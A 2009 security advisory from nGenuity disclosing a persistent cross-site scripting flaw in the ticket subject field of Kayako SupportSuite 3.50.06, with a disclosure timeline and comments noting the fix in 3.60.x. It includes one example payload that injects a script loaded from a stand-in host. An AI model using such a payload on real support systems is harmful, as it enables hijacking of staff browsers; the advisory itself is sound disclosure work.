Aug
08
2009
[NGENUITY] Ticket Subject Persistent XSS in Kayako SupportSuite
nGenuity Information Services – Security Advisory
Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite Application: SupportSuite v3.50.06 Vendor: Kayako Vendor website: http://www.kayako.com Author: Adam Baldwin (adam_baldwin@ngenuity-is.com) Class: Persistent Cross-Site Scripting I. BACKGROUND "SupportSuite is [Kayako's] flagship product, integrating the ticket and e-mail management features of eSupport with the live chat and visitor monitoring features of LiveResponse." [1] II. DETAILS The subject field of a newly created support ticket is not properly encoded before being sent to the browser when the ticket details are viewed. More information on cross-site scripting please refer to the Common Weakness Enumeration specification available cwe.mitre.org [2]. An example attack might look similar to the following. </title><script src="example.com/attack.js"></script> This vulnerability is fixed in version 3.60.x
III. REFERENCES
[1] - http://www.kayako.com
[2] - http://cwe.mitre.org/data/definitions/79.html
IV. VENDOR COMMUNICATION
7.17.2009 - Vulnerability Discovery
7.20.2009 - Initial Vendor Response
7.21.2009 - Patch created, Will be pushed to next stable release
8.08.2009 - Advisory released
Copyright (c) 2009 nGenuity Information Services, LLC
By Jamie Edwards, August 8, 2009 @ 10:53 am
This defect is fixed in 3.60.x
By aaron_howell, August 8, 2009 @ 11:07 am
Thanks for the update, Jamie.